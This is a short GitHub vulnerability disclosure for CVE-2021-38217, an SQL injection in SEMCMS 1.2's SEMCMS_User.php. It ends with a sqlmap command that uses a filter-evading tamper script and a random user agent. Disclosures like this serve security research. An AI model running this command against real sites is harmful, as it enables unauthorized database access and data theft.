CVE-2021-38217: SEMCMS/semcms-1.2-sql-2.md at main · BigTiger2020/SEMCMS

Permalink

Cannot retrieve contributors at this time

• Exploit Title: SENMCMS 1.2 - SQL injection

• Vendor Homepage:http://www.sem-cms.com

• Software Link:http://www.sem-cms.com/xiazai.html

• Version: 1.2

• Vulnerable file:SEMCMS_User.php

• SQL injection sql command:sqlmap.py -r 7.txt --dbms=mysql --level=3 --risk=3 -p ID --tamper=space2comment --random-agent